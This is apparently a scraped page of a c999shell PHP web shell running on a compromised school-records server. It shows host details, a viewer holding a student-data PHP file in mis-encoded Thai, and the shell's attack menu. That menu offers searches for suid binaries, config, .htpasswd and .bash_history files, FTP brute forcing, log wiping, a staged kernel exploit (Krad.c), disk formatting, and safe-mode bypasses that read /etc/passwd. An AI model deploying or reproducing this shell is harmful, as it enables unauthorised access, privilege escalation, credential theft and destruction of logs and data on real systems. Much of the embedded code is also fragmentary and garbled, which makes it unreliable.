Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/edu_depart/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     StudentByProvince.php (10.47 KB)      -rw-r--r--

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
	
	/**  Configuration  */
	include( "../configuration.php" );
	require_once( $_Config_absolute_path . "/includes/framework.php" );

	/**  using 'reg' DB  */
	include("../includes/FunctionDB.php");
	include("../includes/Function.php");

	
	/**  Create Database Object  */
	$dbObj = new DBConn;
	ConnectDB();
		
	/**  Config Table for This Page  */
	$myTable = "StudentBio";
	$myTableFK = "studentId";
	
	/**  Paging */
	$page = $_GET['page'];
	if( $page == "" ) { $page = 1; }
		
	/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
	$perpage = $_REQUEST['perpage'];
	if( $perpage == "" ) { $perpage = 10; }
	
	$param = "";
		} # else
?>












  

    

    

    execQuery($query);
			$numrows = $dbObj->_numrows;
			
			/**  Paging  */
			$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
			$start = ( ($display * $limit) - $limit );
			/**  Paging  */

			$query .= " LIMIT $start, $limit ";
			$result = $dbObj->execQuery($query);
    ?>
    

     

      

        

      
      

        
Л№йТЛЕСЎ » ЁУ№З№№СЎИЦЎЙТ ЁУб№ЎµТБЁС§ЛЗСґ
        
      

        
 
      
      

        

        

          

            
·Сй§ЛБґ:  ГТВЎТГ
            
ЁУ№З№ўйНБЩЕµиНЛ№йТ
          
            >10
            >20
            >50
            >100
          
          
        
         0 ) { ?>
         fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				
				$homeProvinceId = $rs['homeProvinceId'];
          ?>
          

          

            
No
            
ЁС§ЛЗСґ
			
ЄТВ
			
Л­Ф§
			
ЁУ№З№№СЎИЦЎЙТ·Сй§ЛБґ
            
          

            

            
execQuery($sql0);
				  $rs0 = $dbObj->fetchArray($result0);
				  $dbObj->freeresult($result0);
					  echo $rs0['provinceName'];
          	  ?>
            
execQuery($sql1);
				  $countnum1 = $dbObj->_numrows;
				  $dbObj->freeresult($result1);
					  echo $countnum1;
          	  ?>
            
execQuery($query2);
          	  	$countnum2 = $dbObj->_numrows;
				$dbObj->freeresult($result2);
          	  		echo $countnum2;
          	  ?>
            
execQuery($query3);
          	  	$countnum3 = $dbObj->_numrows;
				$dbObj->freeresult($result3);
          	  		echo $countnum3;
          	  ?>
          
          
        
		
        

        

          

           0 ) { ?>
          

            

                

            
            

                
Л№йТ: 
                     1) {	
                            $previous = $display - 1;					

                    ?>
bool(false)


:: Command execute ::
Enter:  
Select: 
-----------------------------------------------------------find all suid filesfind suid files in current dirfind all sgid filesfind sgid files in current dirfind config.inc.php filesfind config* filesfind config* files in current dirfind all writable folders and filesfind all writable folders and files in current dirfind all service.pwd filesfind service.pwd files in current dirfind all .htpasswd filesfind .htpasswd files in current dirfind all .bash_history filesfind .bash_history files in current dirfind all .fetchmailrc filesfind .fetchmailrc files in current dirlist file attributes on a Linux second extended file systemshow opened ports 



:: Shadow's tricks :D  ::

  

    
Useful Commands 
    
    

      

        
        
          
            Kernel version
              Logged in users
                Last to connect
                  Suid bins
                    USER WITHOUT PASSWORD!
                    Write in /etc/?
                    Downloaders?
                    CPUINFO
                    Open ports
                    gcc installed?
					Format box (DANGEROUS)
                    WIPELOGS PT1 (If wget installed)
                    WIPELOGS PT2
                    WIPELOGS PT3
                    Kernel attack (Krad.c) PT1 (If wget installed)
                    Kernel attack (Krad.c) PT2 (L1)
                    Kernel attack (Krad.c) PT2 (L2)
                    Kernel attack (Krad.c) PT2 (L3)
                    Kernel attack (Krad.c) PT2 (L4)
                    Kernel attack (Krad.c) PT2 (L5)
                  
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  

   Kernel Info: 

      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  

   Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    
    




 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]



:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--